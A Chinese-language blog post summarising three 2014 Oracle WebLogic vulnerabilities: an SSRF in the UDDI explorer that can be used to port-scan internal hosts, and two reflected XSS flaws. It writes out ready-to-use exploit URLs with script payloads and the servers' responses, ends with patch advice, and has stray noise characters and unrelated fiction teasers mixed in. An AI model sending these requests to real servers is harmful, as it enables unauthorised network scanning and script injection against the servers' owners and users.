漏洞新聞--weblogic ssrf

CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本10.0.2,10.3.6
Oracle WebLogic web server即可以被外部主機(jī)訪問惨寿，同時也允許訪問內(nèi)部主機(jī)耘纱。比如有一個jsp頁面SearchPublicReqistries.jsp育八，我們可以利用它進(jìn)行攻擊，未經(jīng)授權(quán)通過weblogic server連接任意主機(jī)的任意TCP 端口，可以能冗長的響應(yīng)來推斷在此端口上是否有服務(wù)在監(jiān)聽此端口剪个。
下面是一個沒有服務(wù)監(jiān)聽TCP 23端口的例子：

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&
selfor=Business+location&btnSubmit=Search

響應(yīng)的片斷如下：

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused

下面是一個有服務(wù)監(jiān)聽TCP 23端口的例子：

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&
selfor=Business+location&btnSubmit=Search

響應(yīng)片斷如下：

weblogic.uddi.client.structures.exception.XML_SoapException:
Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.

可以利用這種功能來發(fā)現(xiàn)主機(jī)或?qū)χ鳈C(jī)進(jìn)行端口掃描。

CVE-2014-4241，Reflected Cross Site Scripting in SetupUDDIExploer.jsp 版本：10.0.2,10.3.6
用戶輸入映射到一個cookie值(有效期為1年青责！)，這個值會以不安全的方式寫入到之后的響應(yīng)里取具，暴露給用戶進(jìn)行跨站腳本攻擊脖隶。
惡意的URL：

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
響應(yīng)會為cookier變量的privateregistry設(shè)值，并把瀏覽器重定向到SetupUDDIExplorer.jsp頁面暇检。

HTTP/1.1 302 Moved TemporarilyLocation: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jspSet-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMTContent-Length: 331Content-Type: text/html;charset=UTF-8
重定向的請求為：

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1Host: [vulnerablehost]Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|
http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|
http://uddi.rte.microsoft.com/inquire!Microsoft|
http://services.xmethods.net/glue/inquire/uddi!XMethods|;
privateinquiryurls=<script>alert(2)</script>;
privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener;
consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73;
cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;
那么響應(yīng)的片斷為（響應(yīng)中包含了cookie值：privateinquiryurls）：

<td valign=top width=1%></td><td valign=top width=70%> <p> <h2>Private Registry:</h2> <h3>Search URL: <b><script>alert(1)</script></b></h3> <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3> </p>

這類URL的例子：

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL

CVE-2014-4242产阱，Reflected Cross Site Scriping in consolejndi.portal 版本：10.0.2,10.3.6,12.1.1,12.1.2.0.0
控制臺應(yīng)用試圖去管理Weblogic 應(yīng)用服務(wù)器，正常是不被暴露的块仆，它的攻擊目標(biāo)是管理員构蹬。

這一類URL的例子1：

http://[vulnerablehost]:7001/console/consolejndi.portal?
_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")

響應(yīng)片斷：

<div class="contenttable"><div class="introText"><p>Listing of entries found in context <script>alert(1)</script>:</p></div>

這一類URL2的例子：

http://[vulnerablehost]:7001/console/consolejndi.portal?
_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//

響應(yīng)片斷：

修復(fù)建議：
1.如果業(yè)務(wù)不需要UDDI功能，就關(guān)閉這個功能悔据∽玻可以刪除uddiexporer文件夾，可以可在/weblogicPath/server/lib/uddiexplorer.war解壓后蜜暑，注釋掉上面的jsp再打包铐姚。
2.安裝oracle的更新包。http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

最后編輯于：2017.12.06 05:18:50

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末肛捍，一起剝皮案震驚了整個濱河市隐绵，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌拙毫，老刑警劉巖依许，帶你破解...
沈念sama閱讀 206,968評論 6贊 482
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異缀蹄，居然都是意外死亡峭跳，警方通過查閱死者的電腦和手機(jī)膘婶，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,601評論 2贊 382
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來蛀醉，“玉大人悬襟，你說我怎么就攤上這事≌螅” “怎么了脊岳？”我有些...
開封第一講書人閱讀 153,220評論 0贊 344
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長垛玻。經(jīng)常有香客問我割捅，道長，這世上最難降的妖魔是什么帚桩？我笑而不...
開封第一講書人閱讀 55,416評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任亿驾，我火速辦了婚禮，結(jié)果婚禮上账嚎，老公的妹妹穿的比我還像新娘莫瞬。我一直安慰自己，他們只是感情好醉锄，可當(dāng)我...
茶點(diǎn)故事閱讀 64,425評論 5贊 374
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布乏悄。她就那樣靜靜地躺著，像睡著了一般恳不。火紅的嫁衣襯著肌膚如雪檩小。梳的紋絲不亂的頭發(fā)上，一...
開封第一講書人閱讀 49,144評論 1贊 285
城市分裂傳說
那天烟勋，我揣著相機(jī)與錄音规求，去河邊找鬼。笑死卵惦，一個胖子當(dāng)著我的面吹牛阻肿，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播沮尿，決...
沈念sama閱讀 38,432評論 3贊 401
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼丛塌，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了畜疾？” 一聲冷哼從身側(cè)響起赴邻，我...
開封第一講書人閱讀 37,088評論 0贊 261
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎啡捶，沒想到半個月后姥敛，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 43,586評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡瞎暑，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 36,028評論 2贊 325
?白月光啟示錄
正文我和宋清朗相戀三年彤敛，在試婚紗的時候發(fā)現(xiàn)自己被綠了与帆。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 38,137評論 1贊 334
活死人
序言：一個原本活蹦亂跳的男人離奇死亡墨榄，死狀恐怖玄糟，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情渠概，我是刑警寧澤茶凳，帶...
沈念sama閱讀 33,783評論 4贊 324
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布嫂拴，位于F島的核電站播揪，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏筒狠。R本人自食惡果不足惜猪狈，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,343評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望辩恼。院中可真熱鬧雇庙，春花似錦、人聲如沸灶伊。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,333評論 0贊 19
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽聘萨。三九已至竹椒，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間米辐，已是汗流浹背胸完。一陣腳步聲響...
開封第一講書人閱讀 31,559評論 1贊 262
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留翘贮，地道東北人赊窥。一個月前我還...
沈念sama閱讀 45,595評論 2贊 355
代替公主和親
正文我出身青樓，卻偏偏與公主長得像狸页，于是被迫代替她去往敵國和親锨能。傳聞我的和親對象是個殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,901評論 2贊 345

漏洞新聞--weblogic ssrf

推薦閱讀更多精彩內(nèi)容